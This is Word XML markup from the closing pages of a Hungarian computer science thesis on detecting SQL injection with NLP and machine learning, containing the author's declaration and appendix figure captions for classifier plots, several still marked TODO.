    <w:p w14:paraId="321F5A56" w14:textId="6B0EE7AC" w:rsidR="00D1205B" w:rsidRPr="00D47FAE" w:rsidRDefault="00D1205B" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc71471980"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Nyilatkozat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0C80F749" w14:textId="77777777" w:rsidR="008F7A2C" w:rsidRPr="00D47FAE" w:rsidRDefault="008F7A2C" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="NormlWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2376AC" w14:textId="1BC7B3F0" w:rsidR="008F7A2C" w:rsidRPr="00D47FAE" w:rsidRDefault="008F7A2C" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="NormlWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t xml:space="preserve">Alulírott </w:t>
      </w:r>
      <w:r w:rsidR="00230181" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t>Stiller Marianna</w:t>
      </w:r>
      <w:r w:rsidR="00852C53" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t xml:space="preserve"> programtervező informatikus</w:t>
      </w:r>
      <w:r w:rsidR="00931B08" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t xml:space="preserve"> BSc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t xml:space="preserve"> szakos hallgató, kijelentem, hogy a dolgozatomat a Szegedi Tudományegyetem, Informatikai Intézet </w:t>
      </w:r>
      <w:r w:rsidR="009B0B73" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t>Szoftverfejlesztés</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tanszékén készítettem, </w:t>
      </w:r>
      <w:r w:rsidR="00647A5A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t xml:space="preserve">programtervező informatikus </w:t>
      </w:r>
      <w:r w:rsidR="00712CAA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00647A5A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t>Sc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t xml:space="preserve"> diploma megszerzése érdekében. Kijelentem, hogy a dolgozatot más szakon korábban nem védtem meg, saját munkám eredménye, és csak a hivatkozott forrásokat (szakirodalom, </w:t>
      </w:r>
      <w:r w:rsidR="0078777E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t>eszközök</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t xml:space="preserve"> stb.) használtam fel. Tudomásul veszem, hogy szakdolgozatomat / diplomamunkámat a Szegedi Tudományegyetem Informatikai Intézet könyvtárában, a helyben olvasható könyvek között helyezik el.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0FCCD4" w14:textId="2E70CF1E" w:rsidR="00D1205B" w:rsidRPr="00D47FAE" w:rsidRDefault="00C51453" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="NormlWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5670"/>
          <w:tab w:val="left" w:leader="dot" w:pos="8503"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:t>2021.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:color w:val="343434"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCECEDF" w14:textId="1BAA2280" w:rsidR="005D7F6C" w:rsidRPr="00D47FAE" w:rsidRDefault="005D7F6C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63CBB6" w14:textId="77777777" w:rsidR="005D7F6C" w:rsidRPr="00D47FAE" w:rsidRDefault="005D7F6C" w:rsidP="005D7F6C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118AE28E" w14:textId="5A1A42FA" w:rsidR="005D7F6C" w:rsidRPr="00D47FAE" w:rsidRDefault="005D7F6C" w:rsidP="005D7F6C">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc71471981"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Köszönetnyilvánítás</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="18222879" w14:textId="77777777" w:rsidR="005D7F6C" w:rsidRPr="00D47FAE" w:rsidRDefault="005D7F6C" w:rsidP="00262B9C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D486CD5" w14:textId="2C009450" w:rsidR="00262B9C" w:rsidRPr="00D47FAE" w:rsidRDefault="00262B9C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD11B80" w14:textId="77777777" w:rsidR="00262B9C" w:rsidRPr="00D47FAE" w:rsidRDefault="00262B9C" w:rsidP="00262B9C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1318C06A" w14:textId="777A726B" w:rsidR="00262B9C" w:rsidRPr="00D47FAE" w:rsidRDefault="00262B9C" w:rsidP="00262B9C">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc71471982"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Mellékletek</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="379A5DDA" w14:textId="2D08C633" w:rsidR="00262B9C" w:rsidRPr="00D47FAE" w:rsidRDefault="00262B9C" w:rsidP="00262B9C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01217908" w14:textId="7904D790" w:rsidR="003A5935" w:rsidRDefault="001803E9" w:rsidP="00804404">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7656FD" wp14:editId="783CD91F">
            <wp:extent cx="4320000" cy="2264919"/>
            <wp:effectExtent l="0" t="0" r="4445" b="254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2264919"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE9810" w14:textId="62A83124" w:rsidR="00E24D6C" w:rsidRDefault="00817C80" w:rsidP="00E24D6C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.1.3-as ábra: </w:t>
      </w:r>
      <w:r w:rsidR="00B85403">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a Logistic Regression </w:t>
      </w:r>
      <w:r w:rsidR="001C6584">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A8EBBF" w14:textId="59D88B3C" w:rsidR="00D213EF" w:rsidRDefault="00D213EF" w:rsidP="00E24D6C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6362653F" w14:textId="150AD877" w:rsidR="007E5BA7" w:rsidRDefault="007E5BA7" w:rsidP="00E24D6C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C1EFE88" wp14:editId="4451A573">
            <wp:extent cx="3600000" cy="2002550"/>
            <wp:effectExtent l="0" t="0" r="63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2002550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A409289" w14:textId="0440A81F" w:rsidR="007E5BA7" w:rsidRDefault="007E5BA7" w:rsidP="00E24D6C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.2.1-es ábra: a </w:t>
      </w:r>
      <w:r w:rsidRPr="007E5BA7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>K-Nearest Neighbors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00086829">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDCABBA" w14:textId="5C40350E" w:rsidR="007E5BA7" w:rsidRDefault="007E5BA7" w:rsidP="00E24D6C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264044A3" w14:textId="40C6DD02" w:rsidR="0097569F" w:rsidRDefault="0097569F" w:rsidP="00E24D6C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281962E8" wp14:editId="0296E34E">
            <wp:extent cx="4320000" cy="2543040"/>
            <wp:effectExtent l="0" t="0" r="444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543040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A4D22" w14:textId="01B83C50" w:rsidR="002C297B" w:rsidRDefault="0097569F" w:rsidP="002C297B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.3.1-es ábra: </w:t>
      </w:r>
      <w:r w:rsidR="004A45B9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a Linear Support Vector </w:t>
      </w:r>
      <w:r w:rsidR="00D4009B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567AB7F8" w14:textId="77777777" w:rsidR="002C297B" w:rsidRDefault="002C297B" w:rsidP="002C297B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:sectPr w:rsidR="002C297B" w:rsidSect="003A3649">
          <w:headerReference w:type="default" r:id="rId21"/>
          <w:footerReference w:type="default" r:id="rId22"/>
          <w:headerReference w:type="first" r:id="rId23"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36016891" w14:textId="19500DDE" w:rsidR="002C297B" w:rsidRDefault="00C16D56" w:rsidP="002C297B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C16D56">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F30B83E" wp14:editId="4DB24774">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4103370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1511300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="377825" cy="219075"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="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19075"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5633590C" w14:textId="77777777" w:rsidR="00C16D56" w:rsidRPr="00C16D56" w:rsidRDefault="00C16D56" w:rsidP="00C16D56">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:sz w:val="14"/>
                                <w:szCs w:val="14"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00C16D56">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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30B83E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Szövegdoboz 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:323.1pt;margin-top:119pt;width:29.75pt;height:1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5633590C" w14:textId="77777777" w:rsidR="00C16D56" w:rsidRPr="00C16D56" w:rsidRDefault="00C16D56" w:rsidP="00C16D56">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:sz w:val="14"/>
                          <w:szCs w:val="14"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00C16D56">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:sz w:val="14"/>
                          <w:szCs w:val="14"/>
                        </w:rPr>
                        <w:t>…</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C16D56">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EF013A1" wp14:editId="3A75825B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2795270</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1416050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="377825" cy="219075"/>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19075"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="51E51CD1" w14:textId="576B5E82" w:rsidR="00C16D56" w:rsidRPr="00C16D56" w:rsidRDefault="00C16D56">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:sz w:val="14"/>
                                <w:szCs w:val="14"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00C16D56">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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013A1" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:220.1pt;margin-top:111.5pt;width:29.75pt;height:1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="51E51CD1" w14:textId="576B5E82" w:rsidR="00C16D56" w:rsidRPr="00C16D56" w:rsidRDefault="00C16D56">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:sz w:val="14"/>
                          <w:szCs w:val="14"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00C16D56">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:sz w:val="14"/>
                          <w:szCs w:val="14"/>
                        </w:rPr>
                        <w:t>…</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002C297B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28834D53" wp14:editId="224264A5">
            <wp:extent cx="8891270" cy="2169160"/>
            <wp:effectExtent l="0" t="0" r="5080"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4">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8891270" cy="2169160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F0BD9F" w14:textId="7F10C0DA" w:rsidR="002C297B" w:rsidRPr="00D47FAE" w:rsidRDefault="002C297B" w:rsidP="002C297B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1-es ábra: </w:t>
      </w:r>
      <w:r w:rsidR="00440746">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">machine_learning_app, </w:t>
      </w:r>
      <w:r w:rsidR="004F6057">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a program fő mappájának felépítése</w:t>
      </w:r>
      <w:r w:rsidR="00AB2F47">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> TODO</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002C297B" w:rsidRPr="00D47FAE" w:rsidSect="002C297B">
      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>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6A63" w14:textId="77777777" w:rsidR="00C45D81" w:rsidRDefault="00C45D81" w:rsidP="00520DF3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7DA83F42" w14:textId="77777777" w:rsidR="00C45D81" w:rsidRDefault="00C45D81" w:rsidP="0052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123478"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="57264F12" w14:textId="235A87BB" w:rsidR="00A67FE7" w:rsidRPr="008D138C" w:rsidRDefault="00A67FE7" w:rsidP="00520DF3">
        <w:pPr>
          <w:pStyle w:val="llb"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r w:rsidRPr="008D138C">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="008D138C">
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="008D138C">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="008D138C">
          <w:rPr>
            <w:lang w:val="hu-HU"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="008D138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C4BEE" w14:textId="77777777" w:rsidR="00C45D81" w:rsidRDefault="00C45D81" w:rsidP="00520DF3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="72EF0217" w14:textId="77777777" w:rsidR="00C45D81" w:rsidRDefault="00C45D81" w:rsidP="00520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E7C8" w14:textId="76DAA20F" w:rsidR="00A67FE7" w:rsidRPr="00D40AB7" w:rsidRDefault="00A67FE7" w:rsidP="00D40AB7">
    <w:pPr>
      <w:pStyle w:val="lfej"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:lang w:val="hu-HU"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="005602A1">
      <w:rPr>
        <w:lang w:val="hu-HU"/>
      </w:rPr>
      <w:t>SQ</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="hu-HU"/>
      </w:rPr>
      <w:t>L</w:t>
    </w:r>
    <w:r w:rsidRPr="005602A1">
      <w:rPr>
        <w:lang w:val="hu-HU"/>
      </w:rPr>
      <w:t xml:space="preserve"> injection detektálás természetes nyelvi feldolgozó rendszerek és gépi tanulás ál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2413" w14:textId="7618E7C4" w:rsidR="00A67FE7" w:rsidRPr="002C297B" w:rsidRDefault="002C297B" w:rsidP="002C297B">
    <w:pPr>
      <w:pStyle w:val="lfej"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:lang w:val="hu-HU"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="005602A1">
      <w:rPr>
        <w:lang w:val="hu-HU"/>
      </w:rPr>
      <w:t>SQ</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="hu-HU"/>
      </w:rPr>
      <w:t>L</w:t>
    </w:r>
    <w:r w:rsidRPr="005602A1">
      <w:rPr>
        <w:lang w:val="hu-HU"/>
      </w:rPr>
      <w:t xml:space="preserve"> injection detektálás természetes nyelvi feldolgozó rendszerek és gépi tanulás ál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C55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EE6563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9164BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89FC1B28"/>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pStyle w:val="Stlu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545D10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9065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03F65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDDEA2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4A634A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EE6563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2E4A03"/>
